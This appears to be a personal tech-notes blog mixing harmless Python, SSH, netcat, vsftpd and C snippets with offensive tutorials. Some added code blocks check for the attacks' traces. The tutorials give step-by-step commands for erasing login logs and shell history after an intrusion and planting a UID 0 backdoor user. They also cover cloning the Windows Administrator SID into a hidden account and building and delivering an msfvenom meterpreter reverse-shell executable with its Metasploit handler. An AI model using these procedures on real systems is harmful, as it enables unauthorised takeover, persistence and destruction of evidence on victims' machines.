Socket

Server

import socket

HOST = 'localhost'
PORT = 1337

# Python 3 version: sockets carry bytes, print is a function.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)

conn, addr = s.accept()
print('Connected by', addr)

while True:
    data = conn.recv(1024)
    if not data:        # empty read means the client closed the connection
        break
    print(data)
    conn.send(data)     # echo it back

conn.close()

Client

import socket

HOST = 'localhost'
PORT = 1337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

string1 = input('pls enter something:')   # raw_input() in Python 2
s.send(string1.encode())                   # sockets take bytes, not str
data = s.recv(1024)

s.close()
print('Received', repr(data))
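The echo exchange above, as an added example that is not part of the original post: server and client run in one process on the loopback interface, the server binds port 0 so the OS picks a free port, and the client reads in a loop because a single recv(1024) is not guaranteed to return the whole message. Port, payload and the recv_exactly helper are assumptions of this example.

```python
import socket
import threading

# Added example (not from the original post): the same echo protocol as the
# server/client above, with both sides in one process so the round trip can
# be checked. The server reads until the client half-closes, so a message
# longer than one recv(1024) is still echoed completely.

def serve_one_client(listener):
    """Accept one client and echo everything it sends until it shuts down."""
    conn, _addr = listener.accept()
    with conn:
        while True:
            chunk = conn.recv(1024)
            if not chunk:          # peer closed its sending side
                break
            conn.sendall(chunk)    # sendall() loops until every byte is out

def recv_exactly(sock, n):
    """recv() may return fewer bytes than requested; loop until n bytes arrive."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before %d bytes arrived" % n)
        buf += chunk
    return bytes(buf)

def echo_roundtrip(payload):
    """Start an echo server on 127.0.0.1, send payload, return what comes back."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))       # port 0: let the OS choose
    listener.listen(1)
    port = listener.getsockname()[1]
    server = threading.Thread(target=serve_one_client, args=(listener,))
    server.start()
    try:
        with socket.create_connection(("127.0.0.1", port), timeout=5) as client:
            client.sendall(payload)
            client.shutdown(socket.SHUT_WR)   # tell the server we are done sending
            echoed = recv_exactly(client, len(payload))
    finally:
        server.join()
        listener.close()
    return echoed

if __name__ == "__main__":
    msg = b"x" * 5000   # constructed payload, longer than one recv(1024)
    assert echo_roundtrip(msg) == msg
    print("echoed", len(msg), "bytes")
```

The half-close (SHUT_WR) is what lets the server's `recv()` return an empty read and exit its loop; without it both sides would wait on each other.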

Enable ssh on OS X

The Apple Mac OS X operating system has SSH installed by default,
but the SSH daemon is not enabled. This means you can't log in
remotely or do remote copies until you enable it.

To enable it, go to ‘System Preferences’. Under ‘Internet & Networking’
there is a ‘Sharing’ icon. Run that. In the list that appears, check the
‘Remote Login’ option.

This starts the SSH daemon immediately and you can remotely login using
your username. The ‘Sharing’ window shows at the bottom the name and IP
address to use. You can also find this out using ‘whoami’ and ‘ifconfig’
from the Terminal application.

You can then scp files to it from Kali Linux like this:
scp Socket* like@192.168.1.110:~

List in Python

List

Inserting an element at a given position in a list

name.insert(1, "hello") inserts "hello" at position 1 of name (positions count from 0)
append adds to the end

name.remove("hello") removes "hello"

The pop method pops an element off the list
List.pop(0) pops element 0

An interesting phenomenon with the copy operation

name = ['alex', 'jack', [1, 2, 3, 34]]
name1 = name.copy()
name1[0] = 'ALEX'
name1[2][1] = 11111

print(name)
print(name1)

The output is:
like$python3 copytest.py
['alex', 'jack', [1, 11111, 3, 34]]
['ALEX', 'jack', [1, 11111, 3, 34]]
like$

We see that the nested list changed in both lists, because the inner list is shared data!

When we create name, Python stores name at an address in memory, and the list nested inside name is also assigned its own address.
When we copy, we take name's elements unchanged as a new list, but the nested list element still points to the original
inner list's address, so when we later modify the inner list through name, the inner list in name1 is affected as well!

We can use Python's id function to verify this!
like$python3
Python 3.5.1 (v3.5.1:37a07cee5969, Dec 5 2015, 21:12:44)
[GCC 4.2.1 (Apple Inc. build 5666) (dot 3)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> list1 = [1, 2, [1, 2, 3]]
>>> list2 = list1.copy()
>>> id(list1)
4313896776
>>> id(list2)
4313896456
>>> id(list1[2])
4313896520
>>> id(list2[2])
4313896520

Deep copy

import copy

name = ['alex', 'jack', [1, 2, 3, 34]]
name1 = copy.deepcopy(name)   # lists have no .deepcopy() method; use the copy module
name1[0] = 'ALEX'
name1[2][1] = 11111

This copies the data completely, so the nested list gets its own address as well:

>>> import copy
>>> list3 = copy.deepcopy(list1)
>>> id(list3)
4314698952
>>> id(list3[2])
4314754312

Differences in sort() between Python 2 and Python 3

Python 3 does not allow sorting numbers and strings together
Python 2 allows it; the order follows the corresponding ASCII codes, numbers first, then letters

index() returns the index of an element
count() returns how many times an element occurs
extend() extends the list with another iterable
append() appends a single element
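The shallow/deep copy behaviour and the Python 3 sort() restriction described above, as an added example that is not part of the original post. It checks object identity with `is` (the same thing id() showed in the sessions), mutates through a shallow copy to show which copies see the change, and demonstrates both the TypeError Python 3 raises for a mixed list and a key function that reproduces the "numbers first, then strings" ordering; function names and sample data are this example's own.

```python
import copy

# Added example (not from the original post): shallow vs deep copy of a
# nested list, plus sort() on a mixed int/str list under Python 3.

def compare_copies(original):
    """Return (shallow_shares_inner, deep_shares_inner) for a nested list
    whose element 2 is itself a list."""
    shallow = original.copy()          # same as original[:] or list(original)
    deep = copy.deepcopy(original)
    return (
        shallow[2] is original[2],     # True: the inner list object is shared
        deep[2] is original[2],        # False: deepcopy copied the inner list too
    )

def mutate_through_copies(original):
    """Apply the post's two assignments to a shallow copy and return
    (original, shallow, deep) so the effect on each can be compared."""
    shallow = original.copy()
    deep = copy.deepcopy(original)
    shallow[0] = "ALEX"        # rebinds slot 0 of the copy only
    shallow[2][1] = 11111      # mutates the inner list shared with original
    return original, shallow, deep

def sort_mixed(values):
    """Python 3 refuses to order int against str: return the sorted list,
    or the TypeError message when the list is mixed."""
    try:
        return sorted(values)
    except TypeError as exc:
        return str(exc)

def sort_numbers_first(values):
    """Mixed list ordered numbers first, then strings, as the post describes
    Python 2 doing; the key makes the comparison well-defined in Python 3."""
    return sorted(values, key=lambda v: (isinstance(v, str), v))

if __name__ == "__main__":
    name = ["alex", "jack", [1, 2, 3, 34]]   # constructed, same as the post
    print(compare_copies(name))              # (True, False)
    print(mutate_through_copies(name))
    print(sort_mixed([1, "a"]))              # TypeError text under Python 3
    print(sort_numbers_first([2, "b", 1, "a"]))
```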

Deleting records after an intrusion

Delete successful login records:
echo > /var/log/wtmp
last

Delete failed login records:
echo > /var/log/btmp
lastb

Delete the command history
clear history
history -c

Leave a user behind
useradd -d /usr/sam -m sam
passwd sam    (set a password)

Give sam the same privileges as root
Open /etc/passwd, change sam's 500 (UID/GID) entries to 0, save and exit
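Added defender-side example, not part of the original post: two checks for the traces the steps above leave behind. A non-root account whose UID or GID is 0 in /etc/passwd is a backdoor, and `echo > /var/log/wtmp` does not delete the file but leaves a one-byte file containing a newline, which is not a whole number of utmp records. The passwd content is constructed; the 384-byte record size is the glibc x86-64 struct utmp size and is an assumption about the platform.

```python
import os
import tempfile

# Added example (not from the original post): audit checks for a UID/GID 0
# account hidden in /etc/passwd and for a login accounting file that has
# been emptied with `echo >`.

UTMP_RECORD_SIZE = 384   # sizeof(struct utmp) on glibc x86-64 (assumption)

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
like:x:1000:1000::/home/like:/bin/bash
sam:x:0:0::/usr/sam:/bin/bash
"""   # constructed: 'sam' has had both 500 fields changed to 0

def find_uid0_accounts(passwd_text):
    """Return names of accounts other than root whose UID or GID is 0."""
    suspicious = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            continue          # malformed line; a fuller audit would flag this too
        name, uid, gid = fields[0], fields[2], fields[3]
        if name != "root" and (uid == "0" or gid == "0"):
            suspicious.append(name)
    return suspicious

def wtmp_looks_wiped(path):
    """True if a wtmp/btmp file is empty or not a whole number of records.
    `echo > file` truncates it and writes a single "\\n", so size becomes 1."""
    size = os.path.getsize(path)
    if size == 0:
        return True
    return size % UTMP_RECORD_SIZE != 0

def make_sample_file(data):
    """Write constructed bytes to a temp file and return its path."""
    f = tempfile.NamedTemporaryFile(delete=False)
    f.write(data)
    f.close()
    return f.name

if __name__ == "__main__":
    print("UID/GID 0 accounts besides root:", find_uid0_accounts(SAMPLE_PASSWD))
    print("wiped:", wtmp_looks_wiped(make_sample_file(b"\n")))
    print("intact:", wtmp_looks_wiped(make_sample_file(b"\0" * UTMP_RECORD_SIZE * 3)))
```

A sudden drop in wtmp size, or `last` showing only a "wtmp begins" line dated after the machine was installed, is the same signal seen from the command line.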

Windows: cloning the Administrator account (experiment)

Cloning the Windows Administrator account

Preface: this is only a small experiment whose goal is to clone the Windows super-administrator.
The main principle is to obtain privileges via the SID (Security Identifier).

Experiment steps

1. CMD: add an account
"net user linet$ 123 /add"

2. CMD: open regedt32
Set the Administrator permission on HKEY_LOCAL_MACHINE\SAM to full control
See the figure below

3. CMD: open regedit
Look up the registry values corresponding to the Administrator and linet$ users, then export them.
I exported three files here: linet.reg, 000003EB.reg and 000001F4.reg,
where 000003EB.reg corresponds to the linet$ user and 000001F4.reg to Administrator.
Details in the figure below

4. Open 000003EB.reg and 000001F4.reg in Notepad, and overwrite the corresponding part of 000003EB.reg with the content in the red box of 000001F4.reg shown in the figure below


5. CMD: delete the linet$ account
"net user linet$ /del"

6. Import the linet.reg and 000003EB.reg registry files, in that order
Don't get the order wrong; I don't know what happens if you do, I simply haven't tried it, ZZ

7. In CMD, set a password for linet$
"net user linet$ 123"

8. Test a remote login
See the figure below


Summary

The key to this test is really seizing the SID: Windows distinguishes users by SID,
not by account name. We exploited this to copy Administrator's privileges, which is
why logging in remotely with the linet$ account shows the same desktop as an
Administrator login, because the privileges are the same. Also, hackers in practice like to clone the Guest account. Why?
Because then no extra account is visible in the GUI. A slightly careful system administrator
will watch for extra accounts, and an account created with net user, even with a $ suffix,
is hidden in cmd but still visible in the GUI! That is why hackers prefer
cloning the Guest account, and it also explains why classified-protection (等保) assessments
require the Administrator and Guest accounts to be renamed (note that these two accounts cannot be deleted).
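The SID point above, turned into a defender-side check as an added example that is not part of the original post. Because Windows keys accounts by RID, the clone leaves a user key under a different RID whose copied registry value is identical to the built-in Administrator key (RID 0x1F4 = 500). The records here are constructed; `value` stands for whichever registry value step 4 copies, and the record format is this example's own rather than a real SAM export parser.

```python
# Added example (not from the original post): spotting a cloned account in
# a list of SAM user-key records. Each record is {name, rid, value}; `value`
# is the copied blob from step 4 (field name and data are constructed).

ADMIN_RID = 0x1F4   # 500, built-in Administrator
GUEST_RID = 0x1F5   # 501, built-in Guest

SAMPLE_RECORDS = [   # constructed; hex blobs are placeholders, not real SAM data
    {"name": "Administrator", "rid": ADMIN_RID, "value": "0300010000000000f4010000"},
    {"name": "Guest",         "rid": GUEST_RID, "value": "0300010000000000f5010000"},
    {"name": "like",          "rid": 0x3E8,     "value": "0300010000000000e8030000"},
    {"name": "linet$",        "rid": 0x3EB,     "value": "0300010000000000f4010000"},
]

def find_cloned_accounts(records):
    """Names of keys that are not Administrator's RID but carry
    Administrator's value: the signature of the clone described above."""
    admin_values = {r["value"] for r in records if r["rid"] == ADMIN_RID}
    return [r["name"] for r in records
            if r["rid"] != ADMIN_RID and r["value"] in admin_values]

def find_hidden_accounts(records):
    """Names ending in '$' do not show in `net user` output but are real
    accounts; the post notes they are still visible in the GUI."""
    return [r["name"] for r in records if r["name"].endswith("$")]

def find_renamed_builtins(records):
    """The built-in RIDs cannot be deleted, so check whether their names are
    still the defaults, which the post says assessments require changing."""
    defaults = {ADMIN_RID: "Administrator", GUEST_RID: "Guest"}
    return [r["name"] for r in records
            if r["rid"] in defaults and r["name"] == defaults[r["rid"]]]

if __name__ == "__main__":
    print("cloned:", find_cloned_accounts(SAMPLE_RECORDS))       # ['linet$']
    print("hidden:", find_hidden_accounts(SAMPLE_RECORDS))       # ['linet$']
    print("still default names:", find_renamed_builtins(SAMPLE_RECORDS))
```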

Sayonara, enough rambling, off to watch videos, ZZ…

Hack Windows 10-8-8.1-7 With Metasploit

How to hack windows 10-8-8.1-7 with Metasploit

Steps

Generate an executable file

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.130.132 LPORT=4444 -f exe > /root/Desktop/WindowsPath.exe

The "LHOST" is our local machine!
WindowsPath.exe is the executable file which we
will use later on the target machine

Using multi handler

1. Open msfconsole
   Just run the command "msfconsole"
2. Use the multi handler
   Just run the command "use multi/handler"
3. Set the payload
   Just run the command "set PAYLOAD windows/meterpreter/reverse_tcp"
4. Set LHOST and LPORT on Kali Linux
   Just run the following commands
   "set LHOST 192.168.130.132"
   "set LPORT 4444"

Start the apache2 service in Debian

1. Start the apache2 service
   Just run the command "service apache2 start"
2. Open the browser and enter "localhost" to see
   if the Apache server is working

Well, my server works quite well. Let's continue.

Put the executable file in our server

"cp /root/Desktop/WindowsPath.exe /var/www/mybase/"
Notice: I changed the location of DocumentRoot.
If you don't know how to change the location, please google it, ZZ

Exploit

Just run "exploit"
When the victim opens the WindowsPath.exe file, our
work is done.

Test

Run "sysinfo" to see the version of Windows
Run "shell" to open a Windows shell

Here is my test; I finished it on my virtual machines.
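Added defender-side example, not part of the original post: the delivery step above leaves a trace in the web server's access log, so this runs simple detection logic over constructed Apache combined-format log lines and reports which client fetched an executable. The log lines, the regex and the extension list are this example's own.

```python
import re

# Added example (not from the original post): flag successful downloads of
# executable-looking files in Apache access logs, grouped by client IP.
# Sample lines are constructed in the combined log format.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".ps1", ".bat", ".hta")

SAMPLE_LOG = [   # constructed
    '192.168.130.140 - - [10/Mar/2016:10:01:02 +0800] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '192.168.130.140 - - [10/Mar/2016:10:01:09 +0800] "GET /WindowsPath.exe HTTP/1.1" 200 73802 "-" "Mozilla/5.0"',
    '192.168.130.141 - - [10/Mar/2016:10:02:30 +0800] "GET /WindowsPath.exe HTTP/1.1" 404 209 "-" "curl/7.47"',
    '192.168.130.142 - - [10/Mar/2016:10:03:15 +0800] "HEAD /setup.EXE HTTP/1.1" 200 - "-" "Mozilla/5.0"',
    'not a log line at all',
]

def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def executable_downloads(log_lines):
    """Return {client_ip: [paths]} for 2xx GET requests of executable-looking
    files. HEAD requests and failed fetches (404 etc.) are not downloads."""
    hits = {}
    for line in log_lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "GET":
            continue
        if not rec["status"].startswith("2"):
            continue
        path = rec["path"].split("?", 1)[0]          # drop any query string
        if path.lower().endswith(EXECUTABLE_EXT):
            hits.setdefault(rec["ip"], []).append(path)
    return hits

if __name__ == "__main__":
    for ip, paths in executable_downloads(SAMPLE_LOG).items():
        print(ip, "downloaded", ", ".join(paths))
```

On the target side the matching evidence is a new outbound TCP session from the downloaded executable to the LHOST:LPORT pair set in the handler; correlating the two is what turns a single log line into an incident.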

Reference

Binary-Payloads

MS08-067

Brief

MS08-067 patched an issue in netapi32.dll that could allow
attackers to use a specially crafted remote procedure call request
via the Server Message Block (SMB) service to take over a target system.
This vulnerability is particularly dangerous because it does not require
an attacker to authenticate to the target machine before running the
attack. MS08-067 gained eternal infamy as the vulnerability exploited
by the Conficker worm, which was widely reported in the media.

Risk on different platforms

References

Netapi32.dll and MS08-067

Rapid7

Results from Metasploit

msf > info exploit/windows/smb/ms08_067_netapi

Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2008-10-28

Provided by:
hdm <x@hdm.io>
Brett Moore <brett.moore@insomniasec.com>
frank2 <frank2@dc949.org>
jduck <jduck@metasploit.com>

Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
6 Windows XP SP3 English (AlwaysOn NX)
7 Windows XP SP3 English (NX)
8 Windows XP SP2 Arabic (NX)
9 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
10 Windows XP SP2 Chinese - Simplified (NX)
11 Windows XP SP2 Chinese - Traditional (NX)
12 Windows XP SP2 Czech (NX)
13 Windows XP SP2 Danish (NX)
14 Windows XP SP2 German (NX)
15 Windows XP SP2 Greek (NX)
16 Windows XP SP2 Spanish (NX)
17 Windows XP SP2 Finnish (NX)
18 Windows XP SP2 French (NX)
19 Windows XP SP2 Hebrew (NX)
20 Windows XP SP2 Hungarian (NX)
21 Windows XP SP2 Italian (NX)
22 Windows XP SP2 Japanese (NX)
23 Windows XP SP2 Korean (NX)
24 Windows XP SP2 Dutch (NX)
25 Windows XP SP2 Norwegian (NX)
26 Windows XP SP2 Polish (NX)
27 Windows XP SP2 Portuguese - Brazilian (NX)
28 Windows XP SP2 Portuguese (NX)
29 Windows XP SP2 Russian (NX)
30 Windows XP SP2 Swedish (NX)
31 Windows XP SP2 Turkish (NX)
32 Windows XP SP3 Arabic (NX)
33 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
34 Windows XP SP3 Chinese - Simplified (NX)
35 Windows XP SP3 Chinese - Traditional (NX)
36 Windows XP SP3 Czech (NX)
37 Windows XP SP3 Danish (NX)
38 Windows XP SP3 German (NX)
39 Windows XP SP3 Greek (NX)
40 Windows XP SP3 Spanish (NX)
41 Windows XP SP3 Finnish (NX)
42 Windows XP SP3 French (NX)
43 Windows XP SP3 Hebrew (NX)
44 Windows XP SP3 Hungarian (NX)
45 Windows XP SP3 Italian (NX)
46 Windows XP SP3 Japanese (NX)
47 Windows XP SP3 Korean (NX)
48 Windows XP SP3 Dutch (NX)
49 Windows XP SP3 Norwegian (NX)
50 Windows XP SP3 Polish (NX)
51 Windows XP SP3 Portuguese - Brazilian (NX)
52 Windows XP SP3 Portuguese (NX)
53 Windows XP SP3 Russian (NX)
54 Windows XP SP3 Swedish (NX)
55 Windows XP SP3 Turkish (NX)
56 Windows 2003 SP1 English (NO NX)
57 Windows 2003 SP1 English (NX)
58 Windows 2003 SP1 Japanese (NO NX)
59 Windows 2003 SP1 Spanish (NO NX)
60 Windows 2003 SP1 Spanish (NX)
61 Windows 2003 SP1 French (NO NX)
62 Windows 2003 SP1 French (NX)
63 Windows 2003 SP2 English (NO NX)
64 Windows 2003 SP2 English (NX)
65 Windows 2003 SP2 German (NO NX)
66 Windows 2003 SP2 German (NX)
67 Windows 2003 SP2 Portuguese - Brazilian (NX)
68 Windows 2003 SP2 Spanish (NO NX)
69 Windows 2003 SP2 Spanish (NX)
70 Windows 2003 SP2 Japanese (NO NX)
71 Windows 2003 SP2 French (NO NX)
72 Windows 2003 SP2 French (NX)

Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
Space: 410
Avoid: 8 characters

Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.

References:
http://cvedetails.com/cve/2008-4250/
http://www.osvdb.org/49243
http://technet.microsoft.com/en-us/security/bulletin/MS08-067
http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

Netcat

Brief

The Swiss Army Knife of TCP/IP Connections

As the man page notes, the Netcat tool is known as the Swiss Army knife
for TCP/IP connections. It’s a versatile tool.

Usage

root@kali:~#nc -h

Check to see if a port is listening

root@kali:~#nc -v [target ip address] [port]

example:
nc -v 192.168.130.133 80

You can also use the following command:

root@kali:~#nc -lvp 1234
listening on [any] 1234....

You use the options l to listen, v for verbose, and p to specify the port to listen on
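The `nc -v host port` check above, as an added example that is not part of the original post: a Python TCP connect probe with a timeout, exercised against a throwaway listener on the loopback interface (the equivalent of `nc -lvp`) so that both the open and the closed outcome can be seen. Function names and the loopback setup are this example's own.

```python
import socket

# Added example (not from the original post): a connect-based port check like
# `nc -v host port`, plus a local listener like `nc -lvp` to test it against.

def port_is_listening(host, port, timeout=3.0):
    """True if a TCP connection to host:port completes within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:          # ConnectionRefusedError and socket.timeout are OSErrors
        return False

def start_listener(host="127.0.0.1", port=0):
    """Bind a listening socket (port 0 lets the OS pick); return (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    return srv, srv.getsockname()[1]

def check_open_then_closed():
    """Probe a port while a listener is bound, then again after it is closed.
    Returns (while_open, after_close); expected (True, False)."""
    srv, port = start_listener()
    try:
        while_open = port_is_listening("127.0.0.1", port)
    finally:
        srv.close()
    after_close = port_is_listening("127.0.0.1", port)
    return while_open, after_close

if __name__ == "__main__":
    print(check_open_then_closed())   # (True, False)
```

A completed TCP handshake only proves something is listening; like `nc -v`, it says nothing about which service it is, so a banner read or service probe is the next step.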

Kali Linux source file and install vsftpd

Change the source of Kali Linux

cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
EOF

apt-get update
apt-get dist-upgrade # get a coffee, or 10.
reboot

Install vsftpd in Kali Linux

apt-get install vsftpd

If you want to allow local users to log in and to allow FTP uploads, you have to edit the file /etc/vsftpd.conf, uncommenting the following:

local_enable=YES
write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
anonymous_enable=NO

Start the service

service vsftpd start

check:
netstat -nat | grep 21
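The vsftpd.conf settings above, as an added example that is not part of the original post: a small audit that parses a vsftpd.conf, treats commented-out keys as missing, and reports every required setting that is absent or set to another value, so a weak configuration (anonymous_enable=YES with the local-user lines still commented out) is caught before the service is started. Both configuration texts are constructed for the example.

```python
# Added example (not from the original post): check a vsftpd.conf against the
# settings the post enables. Comment lines count as "not set".

REQUIRED = {
    "local_enable": "YES",
    "write_enable": "YES",
    "chroot_list_enable": "YES",
    "chroot_list_file": "/etc/vsftpd.chroot_list",
    "anonymous_enable": "NO",
}

WEAK_CONF = """# constructed: roughly what ships before editing
listen=YES
anonymous_enable=YES
#local_enable=YES
#write_enable=YES
"""

FIXED_CONF = """# constructed: after the edits described in the post
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
"""

def parse_vsftpd_conf(text):
    """Return {key: value} for active key=value lines; comments and blanks skipped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings

def audit_vsftpd_conf(text, required=REQUIRED):
    """Return {key: (expected, actual)} for each required key that is missing
    (actual None) or set to a different value; empty dict means compliant."""
    settings = parse_vsftpd_conf(text)
    problems = {}
    for key, expected in required.items():
        actual = settings.get(key)
        if actual != expected:
            problems[key] = (expected, actual)
    return problems

if __name__ == "__main__":
    for key, (want, got) in audit_vsftpd_conf(WEAK_CONF).items():
        print("%s: expected %s, got %s" % (key, want, got))
    print("fixed config problems:", audit_vsftpd_conf(FIXED_CONF))   # {}
```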

References

Source
Install-vsftpd

Short-circuit evaluation in C

Short-circuit evaluation in C

// Objective-C main from the Xcode template; Foundation.h supplies BOOL and
// @autoreleasepool (the header name was lost in the page markup).
#import <Foundation/Foundation.h>

int main(int argc, const char * argv[]) {
    @autoreleasepool {
        int a = 10, b = 20, c = 30;
        BOOL d = a > b && b++;   // a > b is false: && stops, b++ never runs
        BOOL e = a < b && c++;   // a < b is true: right operand evaluated, c++ runs
        printf("%d\n", b);
        printf("%d\n", c);

    }
    return 0;
}

The result:
b is 20
c is 31
In the statement BOOL d = a > b && b++;,
since a = 10 and b = 20 the condition is naturally false, and because the operator that follows is &&,
the b++ after it is never executed.

In the statement BOOL e = a < b && c++;,
since a = 10 and b = 20 the condition holds, and at that point the operand after && must be evaluated,
so c++ completes its increment, so c = 31.

The same principle applies when && is replaced by other short-circuit operators.

Attached: a photo from my business trip to Tangshan, hehe